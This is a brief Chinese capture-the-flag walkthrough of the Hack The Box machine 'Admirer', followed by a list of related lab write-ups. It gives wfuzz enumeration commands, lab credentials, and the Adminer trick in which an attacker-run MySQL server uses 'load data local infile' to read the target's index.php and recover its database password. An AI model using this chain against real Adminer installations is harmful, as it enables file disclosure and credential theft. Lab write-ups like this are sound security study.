Hack the box靶机 Admirer
不能访问啊
wfuzz一下
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 100
三个账号
先看ftp
得到两个文件
压缩包里是网站源码
waldo:Wh3r3_1s_w4ld0?
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
失败了
利用原理
CREATE DATABASE admirer;
CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';
GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';
FLUSH PRIVILEGES;
create table lez(data VARCHAR(255));
vim /etc/mysql/mariadb.conf.d/50-server.cnf
systemctl restart mysql
登录进来了
load data local infile '../index.php'
into table admirer.lez
fields terminated by '/n'
得到密码
waldo:&<h5b~yK3F#{PaPB&dA}{H>
ssh登录成功
Hack the box靶机 Admirer相关推荐
- Hack The Box靶机——Ambassador
文章目录 前言 一.Web部分 二.提权部分 前言 难度:中等,Hack The Box网站在线靶机.本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consu ...
- Hack the box靶机 October
搜了一下october 有漏洞 然后默认的后台是/backend 试了一下密码admin:admin 竟然进去了???? 有文件上传功能 shel.php 抓包 改成*.php5 右侧click he ...
- Hack the box靶机 Grandpa
migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的
- Hack the box靶机 Chatterbox
修改地址 把生成的字符串替换python里的
- Hack the box靶机 Soli
突破口是oracle 就是真的慢 我快吐了 scott/tiger 不知道为什么老是连接不上 给我整不会了 但是我重启了一下 换了一个端口 然后就好了
- Hack The Box——Traverxec
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- Hack The Box - Starting Point - TIER 0
Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...
最新文章
- 短视频的生成,不要在技术上想当然
- python代码画图案-python基本图形绘制
- 堆栈的定义与操作-顺序存储,链式存储(C语言)
- 修改mysql表的存储引擎
- a pycharm 标记多个_每周分享五个 PyCharm 使用技巧(二)
- matlab如何进行数字信号处理,数字信号处理基础及MATLAB实现(第2版)
- C++中常用字符串相关的编程题
- 数学建模学习笔记(七)——图论最短路问题
- 更新jupyter lab
- 我这么玩Web Api(一):帮助页面或用户手册(Microsoft and Swashbuckle Help Page)
- 网络安全系列之四十 在Linux中设置SET位权限
- std list/vector sort 自定义类的排序就是这么简单
- soul软件的简单分析
- 爬虫字体替换(一)天眼查
- python- 小猫钓鱼纸牌游戏
- Allegro如何更改铜皮的网络操作指导
- ORB、SURF、SIFT特征点提取方法和ICP匹配方法
- 自适应网页设计(Responsive Web Design)别名(响应式web设计、响应式布局)
- stm32捕获占空比_【电机控制】六步法驱动BLDC电机,使用硬件COM事件,STM32+CUBEMX(HAL库)配置...
- Transformer for image quality assessment阅读笔记